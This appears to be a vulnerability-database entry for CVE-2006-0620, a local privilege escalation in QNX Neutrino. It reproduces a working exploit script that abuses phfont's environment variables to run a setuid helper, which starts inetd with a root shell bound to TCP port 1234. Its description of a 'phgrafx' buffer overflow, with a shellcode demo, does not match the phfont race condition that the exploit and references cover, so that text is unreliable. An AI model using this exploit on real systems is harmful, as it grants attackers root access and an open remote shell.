QNX Neutrino Local Privilege Escalation Vulnerability

Vulnerability ID: 1109717
Vulnerability type: Unknown
Published: 2006-02-08
Updated: 2006-02-10
CVE: CVE-2006-0620
CNNVD ID: CNNVD-200602-121
Platform: QNX
CVSS score: 6.2
|Vulnerability sources
https://www.exploit-db.com/exploits/1479
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-121
|Vulnerability details
QNX Neutrino is a microkernel real-time operating system for embedded devices. A buffer overflow vulnerability exists in the "phgrafx" utility of QNX Neutrino; a malicious local user can exploit it to gain elevated privileges. For example:

qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: cannot find palette under '55°|ØHæ1°'.
# id
uid=6(deadbeef) gid=1(bin) euid=0(root) groups=0(root),3(sys),4(adm),5(tty)
#
|Vulnerability EXP
#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
cat > phfontphf.c << __EOF__
/* headers added so the helper compiles cleanly (setuid, system) */
#include <stdlib.h>
#include <unistd.h>
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
return 0;
}
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*

# milw0rm.com [2006-02-08]
|References

Source: IDEFENSE
Name: 20060207 QNX Neutrino RTOS phfont Race Condition Vulnerability
Link: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
Source: VUPEN
Name: ADV-2006-0474
Link: http://www.frsirt.com/english/advisories/2006/0474
Source: SECUNIA
Name: 18750
Link: http://secunia.com/advisories/18750
Source: XF
Name: qnx-phfont-race-condition(24555)
Link: http://xforce.iss.net/xforce/xfdb/24555
Source: BID
Name: 16539
Link: http://www.securityfocus.com/bid/16539
Source: OSVDB
Name: 22963
Link: http://www.osvdb.org/22963
Source: SECTRACK
Name: 1015599
Link: http://securitytracker.com/id?1015599